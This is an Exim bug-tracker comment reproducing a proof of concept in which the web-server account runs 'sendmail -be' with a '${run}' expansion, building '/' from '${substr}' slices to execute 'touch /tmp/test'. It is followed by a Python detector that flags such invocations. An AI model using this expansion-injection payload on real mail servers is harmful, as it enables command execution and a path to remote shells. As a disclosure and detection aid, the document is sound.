https://bugs.exim.org/show_bug.cgi?id=2118
--- Comment #2 from Sandor Takacs <[email protected]> ---
If you run this as www-data you can create a remote shell to the attacked site as the linked PoC says. I tried it on my FreeBSD box:

[[email protected] ~]# ls -l /tmp/test
ls: /tmp/test: No such file or directory
[[email protected] ~]# sudo -u www sendmail -be '${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch ${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}'
[[email protected] ~]# ls -l /tmp/test
-rw------- 1 www wheel 0 May 5 19:42 /tmp/test
[[email protected] ~]#

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
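A defender-side check for the invocation pattern shown in the comment above, as an added example that is not part of the original message or of Exim: it classifies process-exec records in which a mail binary is started in expansion test mode (`-be`) with a `${run...}` item, and notes one-character `${substr}` slices used to produce characters such as "/". The record format, the binary paths, the severity labels and the function name `audit_exec` are assumptions made for illustration.

```python
import os
import re

MTA_NAMES = {"sendmail", "exim", "exim4"}   # names Exim is commonly invoked under
WEB_USERS = {"www", "www-data"}             # accounts named in the comment above
RUN_ITEM = re.compile(r"\$\{run\b")         # expansion item that runs a command
# One-character ${substr} slice of a variable, used above to produce "/"
# without typing it.
CHAR_SLICE = re.compile(r"\$\{substr\{\d+\}\{1\}\{\$\w+\}\}")


def audit_exec(user, argv):
    """Classify one process-exec record; returns (severity, findings)."""
    if not argv or os.path.basename(argv[0]) not in MTA_NAMES:
        return ("none", [])
    args = argv[1:]
    joined = " ".join(args)
    findings = []
    if "-be" in args:
        findings.append("expansion-test-mode")
    if RUN_ITEM.search(joined):
        findings.append("run-item")
    if len(CHAR_SLICE.findall(joined)) >= 2:
        findings.append("char-synthesis")
    if "run-item" in findings:
        # Command execution requested; worst when a web account asks for it.
        severity = "high" if user in WEB_USERS else "medium"
    elif findings:
        severity = "low"
    else:
        severity = "none"
    return (severity, findings)


SLASH = "${substr{0}{1}{$spool_directory}}"
# Constructed exec records; the first reproduces the command line in the comment
# (the /usr/sbin paths are assumed).
SAMPLE_RECORDS = [
    ("www", ["/usr/sbin/sendmail", "-be",
             "${run{" + SLASH + "usr" + SLASH + "bin" + SLASH + "touch "
             + SLASH + "tmp" + SLASH + "test}}"]),
    ("www", ["/usr/sbin/sendmail", "-t", "-i", "-fbounce@example.org"]),
    ("root", ["/usr/sbin/exim", "-be", "$primary_hostname"]),
]

if __name__ == "__main__":
    for user, argv in SAMPLE_RECORDS:
        print(user, os.path.basename(argv[0]), *audit_exec(user, argv))
```

An administrator testing expansions by hand lands in the "low" bucket; a web-server account doing the same with a `${run}` item is the case the comment reproduces.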
